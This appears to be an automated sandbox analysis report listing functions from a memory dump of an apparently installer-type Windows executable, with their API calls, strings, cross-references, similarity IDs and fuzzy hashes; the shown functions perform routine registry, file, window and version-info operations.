Uniqueness

Uniqueness Score: -1.00%

Function 004394E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(DWMAPI.DLL,?,?,?,00478BCD), ref: 00439512

Strings

DwmExtendFrameIntoClientArea, xrefs: 0043952A
DWMAPI.DLL, xrefs: 0043950D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: DWMAPI.DLL$DwmExtendFrameIntoClientArea
API String ID: 1029625771-2956373744
Opcode ID: f1c5f01dccdcd0255f15f3f41d9913487896009a41f4e6cfb11590aefadda4c3
Instruction ID: 2533bf740d6d0fef060d160b55d48e6167c81621efa87fb8f56eccf84f4b3c06
Opcode Fuzzy Hash: f1c5f01dccdcd0255f15f3f41d9913487896009a41f4e6cfb11590aefadda4c3
Instruction Fuzzy Hash: 36F036B2601310BFE7215B69ACDCB4F3694975C315F10543BAA1A92362D7BC0DCCDB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004DE1CC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,004DE54B,00000000,004DE566,?,00000005,00000000,00000000,?,004FCCF4), ref: 004DE22E

Strings

RegisteredOrganization, xrefs: 004DE21D
RegisteredOwner, xrefs: 004DE20B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: 83bb62b13b32fe178e2ca9833abbeb25b2e29bb0979a39bc553a956e2b27598b
Instruction ID: 51872a4b968b3c8950a996b6790c7adbb9f0015cbe27227cdba7499fa3368a13
Opcode Fuzzy Hash: 83bb62b13b32fe178e2ca9833abbeb25b2e29bb0979a39bc553a956e2b27598b
Instruction Fuzzy Hash: F0F0F030704148AFE708E296CDA6BAE77A8A702304F60007BF6005F3C1C6789E059B48

Uniqueness

Uniqueness Score: -1.00%

Function 004D5290, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004D54EA), ref: 004D52B5
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004D54EA), ref: 004D52CC

Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37

Strings

CreateFile, xrefs: 004D52C1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: CreateFile
API String ID: 2528220319-823142352
Opcode ID: a77923e423198066fc0b00e99ad6f12ae22fbfbf6a5381bfbad6bd1a03835f38
Instruction ID: e9c940e8d23523cf296757f77d8123820af29935227c8978f2e0e3f3b7c65102
Opcode Fuzzy Hash: a77923e423198066fc0b00e99ad6f12ae22fbfbf6a5381bfbad6bd1a03835f38
Instruction Fuzzy Hash: 89E06D302443046BE610A769CCC6F4973989B0573CF108152F645AF3D3CAB9EC81865C

Uniqueness

Uniqueness Score: -1.00%

Function 0042E8C0, Relevance: 4.6, APIs: 3, Instructions: 144registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,0042EA71), ref: 0042E939
RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,0042EA71), ref: 0042E9A9
RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?), ref: 0042EA14

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: c6a256ca2b77c0eb849fd58c5bc524bfa4762c6abff35eb9cc59e4513da43c38
Instruction ID: 4836d1a53404c84c73cf0765aeaaeed8c68258d9f2bc58b5e3cafa5e6262cb3c
Opcode Fuzzy Hash: c6a256ca2b77c0eb849fd58c5bc524bfa4762c6abff35eb9cc59e4513da43c38
Instruction Fuzzy Hash: A741B370F00218AFDB11EBA6D842B9EB7FAAF44344F95447AB845E3282C7399F059748

Uniqueness

Uniqueness Score: -1.00%

Function 00426344, Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,0042648C,?,?,004214C8,00000001), ref: 004263A0
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,0042648C,?,?,004214C8,00000001), ref: 004263CE

Part of subcall function 0040D55C: CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,004214C8,0042640E,00000000,0042648C,?,?,004214C8), ref: 0040D5AA

Part of subcall function 0040D814: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,004214C8,00426429,00000000,0042648C,?,?,004214C8,00000001), ref: 0040D833

GetLastError.KERNEL32(00000000,0042648C,?,?,004214C8,00000001), ref: 00426433

Part of subcall function 00410F70: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,004214C8,00426440,00000000,0042648C,?,?,004214C8,00000001), ref: 00410F8F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 4ebafb9061733ac4e4a1bd852e14f30d216939e702cf820ba28c3b888fade683
Instruction ID: 207c32289ed3582f34b3c45b8b5ed7144cd3c487ec8e13a5d1f2876b7d7034a6
Opcode Fuzzy Hash: 4ebafb9061733ac4e4a1bd852e14f30d216939e702cf820ba28c3b888fade683
Instruction Fuzzy Hash: E4318270B002189FDB10EFA98C42ADEB7F0AB48318F51816AF914A73C2D7795D458AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004E4650, Relevance: 4.6, APIs: 3, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000,00000000,004E478F), ref: 004E4721
AppendMenuW.USER32 ref: 004E4732
AppendMenuW.USER32 ref: 004E474C

Part of subcall function 00474420: GetWindowLongW.USER32(00000000,000000F0), ref: 00474491
Part of subcall function 00474420: GetWindowLongW.USER32(00000000,000000EC), ref: 004744A3
Part of subcall function 00474420: GetClassLongW.USER32(00000000,000000E6), ref: 004744B6
Part of subcall function 00474420: SetWindowLongW.USER32 ref: 004744F6
Part of subcall function 00474420: SetWindowLongW.USER32 ref: 0047450A
Part of subcall function 00474420: SetClassLongW.USER32(00000000,000000E6,?), ref: 0047451E
Part of subcall function 00474420: SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00474558

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Long$Window$Menu$AppendClass$MessageSendSystem
String ID:
API String ID: 2073561586-0
Opcode ID: 452dc2ddb59b09bef30a78b188cc62b20e5cc0071e569d2601f397297faf9074
Instruction ID: 63da4b120baff116062ceed4f970285a97c77a36f9b5513525b733fd1d75c9b5
Opcode Fuzzy Hash: 452dc2ddb59b09bef30a78b188cc62b20e5cc0071e569d2601f397297faf9074
Instruction Fuzzy Hash: C631C4706043845BD310EB3ACCC6B6A3794AB96319F15457AF941973E3CBBC9C089A5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041253C, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00412612), ref: 0041257E
GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125B3
VerQueryValueW.VERSION(?,00412624,?,?,00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125CD

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID:
API String ID: 2179348866-0
Opcode ID: 8c5b856bdecb927ff9b1633c14641042daf61aaa873bbbc593e755ba72af7f68
Instruction ID: 8597d6c3fb7c4a3ec38beb6f047540a6cae548e5be3745bac87735c7989b36e7
Opcode Fuzzy Hash: 8c5b856bdecb927ff9b1633c14641042daf61aaa873bbbc593e755ba72af7f68
Instruction Fuzzy Hash: B9215671A10609AFDB01EFA5CD9189EB7FDEB483047514476B400E3691D778EE54D728

Uniqueness

Uniqueness Score: -1.00%

Function 004ACCD8, Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,?,?,?), ref: 004ACCF8
GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,004ACD73,?,00000000,?,?,?,?), ref: 004ACD25
VerQueryValueW.VERSION(?,004ACD9C,?,?,00000000,?,00000000,?,00000000,004ACD73,?,00000000,?,?,?,?), ref: 004ACD3F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID:
API String ID: 2179348866-0
Opcode ID: bef84ca1fdb68ace35b2475b7fe7e5d1a8b99fc2633aefe85f8831ca9cab25bc
Instruction ID: 7bcec5a31399786b62bbc89f378cb89d298648ad0954409e3809339a02107faa
Opcode Fuzzy Hash: bef84ca1fdb68ace35b2475b7fe7e5d1a8b99fc2633aefe85f8831ca9cab25bc
Instruction Fuzzy Hash: FA219271A00108AFDB01DAA9CC819BFBBFCEB5A340F1544BAF904E3391D6789E048769

Uniqueness

Uniqueness Score: -1.00%

Function 0041253A, Relevance: 4.6, APIs: 3, Instructions: 69COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00412612), ref: 0041257E
GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125B3
VerQueryValueW.VERSION(?,00412624,?,?,00000000,?,00000000,?,00000000,004125F5,?,00000000,?,00000000,00412612), ref: 004125CD

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID:
API String ID: 2179348866-0
Opcode ID: 8b676351b30771217cdecde60571bfffc2e8dd4fac721b99b12144ed8980dad8
Instruction ID: 78b29c9523cf09725b32f4a98304c5efa716b0c12bf15eab49a05554d671a726
Opcode Fuzzy Hash: 8b676351b30771217cdecde60571bfffc2e8dd4fac721b99b12144ed8980dad8
Instruction Fuzzy Hash: D0216671A10209BFCB00DFA5CD918AFB7FDEB08304B514476B500E3291D778EE509718

Uniqueness

Uniqueness Score: -1.00%

Function 004017F8, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00401E07,?,00401ADA), ref: 0040180E

Strings

,jP, xrefs: 00401817, 00401825
,jP, xrefs: 0040181F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: ,jP$,jP
API String ID: 4275171209-4000528981
Opcode ID: 5d1f62ad247cbe67ca2a105773c48f0b04cd6e470e57aae5a891e4acb4eadd7e
Instruction ID: 03b0546ac705445d345df6d4e88d4e8d7795d62d4a8be454eee869accf12312c
Opcode Fuzzy Hash: 5d1f62ad247cbe67ca2a105773c48f0b04cd6e470e57aae5a891e4acb4eadd7e
Instruction Fuzzy Hash: 9AF049B1B513008BDB15AF799D4130A7AD2F789308F10C13DEA09EB7A9E77584169B00

Uniqueness

Uniqueness Score: -1.00%

Function 00470BAC, Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00470BBC
IsWindowEnabled.USER32(?), ref: 00470BC6
EnableWindow.USER32(?,00000000), ref: 00470BEC

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnableEnabledVisible
String ID:
API String ID: 3234591441-0
Opcode ID: d46501bebeafc00ff47df9b4d363ff1e99f8e84b38ac06fc1bffa94e40175278
Instruction ID: 80d53781af6986638e65c2b265dd878f3218a2623050f52a722c61257d06fa87
Opcode Fuzzy Hash: d46501bebeafc00ff47df9b4d363ff1e99f8e84b38ac06fc1bffa94e40175278
Instruction Fuzzy Hash: 26E0E5701452005AE710AF7BDDC2A1AB79CBF54354F50892AB848A73D3DE79FD045664

Uniqueness

Uniqueness Score: -1.00%

Function 004CA018, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

/:*?"<>|, xrefs: 004CA22A, 004CA241

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: /:*?"<>|
API String ID: 0-4078764451
Opcode ID: 815e74b77230fe880f5791c920a67e38c60b0d9d2288f713e5575ee4332dcb37
Instruction ID: 78e3d31ff2c7673dd9f12dc5035f4cff248215a6f13dd27949481a84fa5360e9
Opcode Fuzzy Hash: 815e74b77230fe880f5791c920a67e38c60b0d9d2288f713e5575ee4332dcb37
Instruction Fuzzy Hash: F791A43C7002589BDB50EB65C942FEE73A1AB4530CF1880AAF900AB392D7BDDD55974A

Uniqueness

Uniqueness Score: -1.00%

Function 004C7728, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 004C7846

Strings

PrepareToInstall, xrefs: 004C77EF, 004C78A1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ActiveWindow
String ID: PrepareToInstall
API String ID: 2558294473-1101760603
Opcode ID: 4a2afdbead65caa47cff6c4bf3a70fd68b130b612bf6fd2a7541acfef17478a9
Instruction ID: d6db82061a44e8fb343ba6e2a1c948113361bd64f80789b2b89611aa4848390e
Opcode Fuzzy Hash: 4a2afdbead65caa47cff6c4bf3a70fd68b130b612bf6fd2a7541acfef17478a9
Instruction Fuzzy Hash: D2A1F978604208DFDB40EFA9C985F9E77F1FB48304F1540AAE9049B352C739AE05AB98

Uniqueness

Uniqueness Score: -1.00%

Function 004DEAEC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004DEB34

Strings

Failed to remove temporary directory: , xrefs: 004DEB56

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick
String ID: Failed to remove temporary directory:
API String ID: 536389180-3544197614
Opcode ID: 98102c6bfe12c1258edce4093c68e890a5e1512f32f262f8eca0fab212b82af6
Instruction ID: ddcbb1fea0bb7c9573b253c4432bfb2de283da0c1f1240de396d6096143e72dc
Opcode Fuzzy Hash: 98102c6bfe12c1258edce4093c68e890a5e1512f32f262f8eca0fab212b82af6
Instruction Fuzzy Hash: 0101B130240244AAEB11FB729C62B6E7394AB45704FA1086BF501AB3D2DA7DB900E62C

Uniqueness

Uniqueness Score: -1.00%

Function 0042EB8C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0042EBB7

Strings

dB, xrefs: 0042EBD5

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue
String ID: dB
API String ID: 3660427363-590823066
Opcode ID: 956139e0bcacbd0758f03474c05633ec487da009122d916111bd4678b6b15441
